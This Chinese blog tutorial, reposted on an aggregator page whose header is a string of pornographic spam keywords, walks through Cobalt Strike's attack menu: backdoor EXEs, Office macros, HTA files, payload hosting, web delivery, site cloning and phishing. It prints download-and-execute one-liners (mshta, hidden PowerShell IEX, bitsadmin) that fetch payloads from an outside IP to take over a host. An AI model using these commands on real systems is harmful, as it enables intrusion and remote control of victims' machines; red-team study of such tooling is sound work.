日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CS之攻击菜单详解-后门生成与上线

發布時間:2024/8/1 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CS之攻击菜单详解-后门生成与上线 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

一、生成后門

windows可執行程序exe

payload生成器

Office宏

HTA文檔

二、Web釣魚

網站克隆

文件托管

web投遞

簽名Applet攻擊和智能Applet攻擊

信息收集

站點管理

三、郵件釣魚


在創建完監聽器后 ——> CS監聽器配置,接下來進行后門的生成

一、生成后門

能夠生成如HTA文檔、office宏、payload生成器、exe程序。

windows可執行程序exe

可以看到能生成兩種windows可執行程序,其分別代表stage分階段和unstage(stageless)不分階段。傳送門 ——>?Cobalt Strike中payload的stage與unstage區別

選擇監聽器后,按需生成不同類型的exe

然后在目標機器運行即可上線

payload生成器

該模塊可以生成多種語言的后門Payload,包括C, C#, Python, Java, Perl, Powershell腳本,Powershell命令,Ruby, Raw,免殺框架Veli中的shellcode等。

傳送門 ——>?CS payload生成器(Generator)介紹與上線方式

Office宏

宏病毒是一種常見的計算機病毒,寄存在文檔或模板中,并不會直接感染可執行程序。但是打開攜帶宏病毒的文檔,其中的命令就會被執行,導致文檔所在電腦主機被感染。

傳送門——>?CobaltStrike 生成office宏病毒進行釣魚攻擊

HTA文檔

HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件,其里面可包含html、js、vb等語言。其和VB、C++等程序語言所設計的軟件界面沒什么差別。雙擊hta文件就能運行

CobaltStrike可生成三種類型的hta文件,分別是Executable、Powershell、VBA

?這三類樣本的區別在于:

  • Executable 將會在hta文件中內嵌一個PE文件
  • Powershell 將會在hta文件中內嵌一段Powershell代碼
  • VBA 將會在hta文件中內嵌一段VBA代碼

1. 生成powershell類型的hta文檔

類容如下

雙擊程序運行,主機上線

?另外兩種不推薦使用,因為會報錯如下界面:

二、Web釣魚

web釣魚模塊中有如下選項

網站克隆

克隆就是克隆一個與目標網站看起來一模一樣的站點,然后可以在里面插入攻擊代碼,進行釣魚攻擊

傳送門——>?cs克隆目標站點

文件托管

如上,我們生成了一個hta類型的后門文件,此時需要放在目標機器上雙擊才能運行,這樣是不是有點麻煩了?我們就想能不能把它放在自己的網站上,然后執行命令就能自動下載啟動了?文件托管就是托管一個文件,提供一個文件下載

1. 對生產的evil.hta文件進行托管

如下,填寫好后點擊運行

生成鏈接,只要訪問該鏈接就能將文件下載

運行:mshta http://39.100.88.162:80/download/file.ext,就會對該文件進行下載和運行。主機即可上線

ps:?mshta是Windows內置的一個程序,主要用于執行HTA程序 ,mshta可以直接執行遠端的hta程序

?

web投遞

上面的文件托管需要我們自己選擇一個文件進行托管。而web投遞則是生成并托管一個payload,通過訪問這個url就能下載該payload甚至直接執行。

如下填寫好,可見生成的payload類型有多種

1. payload為powershell

點擊運行,為一段ps腳本,意思為遠程下載腳本并運行。復制此 直接在主機上運行就能自動下載payload并上線上線

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:80/a'))"

2.?payload為powershell IEX

iex是 Invoke-Expression命令 的簡寫,用于執行字符串中的命令 如:iex "ls"

生成powershell iex的payload類型,可見比上面ps類型少了前面執行的部分

IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:8000/a'))

3. payload為exe

可以直接訪問下載exe

4. payload為bitsadmin

Background Intelligent Transfer Service Admin(BITSAdmin) 是一個命令行工具,可以創建下載或上傳文件并監控其進度。BITSAdmin是與windows xp一起發布的。

transfer參數是從遠程服務器下載到本機的簡單便捷的方法。需要定義傳輸任務的名稱,可以是任何名字。在示例中,將所有的傳輸任務定義為hackingarticles。在定義名稱后需要輸入遠程服務器文件名的位置。在遠程服務器上有一個名為ignite.png的示例圖像文件。需要本地的路徑和名稱。如下例子:
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png

所以可以利用bitsadmin工具進行payload下載與運行

在cmd中運行復制的url

?

如下,上線?

簽名Applet攻擊和智能Applet攻擊

  • 簽名Applet攻擊:Java Signed Applet Attack,這個攻擊會啟動一個 web 服務器來托管一個自簽名的 Java applet(用Java語言編寫的小應用程序,可以直接嵌入到網頁中,并能夠產生特殊的效果。)。訪客被要求給這個 applet 權限來運行。當一個訪客準許了這個權限,你就獲取了到他們系統的權限。
  • 智能Applet攻擊:Java Smart Applet Attack,這個applet分析它的環境并決定使用哪個Java漏洞利用。如果Java版本是有漏洞的,此applet會禁用安全沙箱,并使用Cobalt Strike的Java注入器執行payload。

這兩攻擊就不太想嘗試了,因為很少很少有主機會存在applet的運行環境。(我也不知道怎么利用~~)

信息收集

生活一個網站39.100.xx.xx,只要一訪問就跳轉到百度的頁面

然后能在 web日志中看到訪問者的一些信息,如ip,訪問使用的瀏覽器名稱和版本

站點管理

以上生成的站點,我們可以在web站點管理中查看

如?

三、郵件釣魚

這個模塊還是不建議使用,因為有更好的釣魚工具,如swaks ——>?swaks郵件偽造

總結

以上是生活随笔為你收集整理的CS之攻击菜单详解-后门生成与上线的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。